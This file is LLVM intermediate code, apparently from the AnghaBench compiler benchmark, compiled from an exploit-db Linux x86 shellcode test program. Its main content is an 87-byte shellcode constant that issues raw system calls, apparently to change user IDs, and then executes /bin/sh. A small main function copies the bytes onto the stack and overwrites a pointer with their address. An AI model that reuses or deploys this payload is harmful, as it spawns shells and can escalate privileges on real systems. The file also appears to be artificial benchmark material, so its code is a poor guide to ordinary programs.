; ModuleID = '/home/carl/AnghaBench/exploitdb/shellcodes/linux_x86/extr_13415.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/shellcodes/linux_x86/extr_13415.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@__const.main.star = private unnamed_addr constant [87 x i8] c"\89\DA\8BL$\08\8B\\$\04\B8'\00\00\00\CD\80\89\DA\8B\\$\04\B8=\00\00\00\CD\80/bin/sh1\C0\B0F1\DB1\C9\CD\80\E9\16\00\00\00[1\C0\88C\07\89X\08\89C\0C\B0\0B\8DK\08\8DS\0C\CD\80\E8\E5\FF\FF\FF/bin/sh\00", align 16

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32*, align 8
  %2 = alloca i64, align 8
  %3 = alloca [87 x i8], align 16
  store i64 4, i64* %2, align 8
  %4 = bitcast [87 x i8]* %3 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 16 %4, i8* align 16 getelementptr inbounds ([87 x i8], [87 x i8]* @__const.main.star, i32 0, i32 0), i64 87, i1 false)
  %5 = getelementptr inbounds [87 x i8], [87 x i8]* %3, i64 0, i64 0
  %6 = ptrtoint i8* %5 to i32
  %7 = bitcast i32** %1 to i32*
  %8 = load i64, i64* %2, align 8
  %9 = getelementptr inbounds i32, i32* %7, i64 %8
  store i32 %6, i32* %9, align 4
  ret i32 0
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
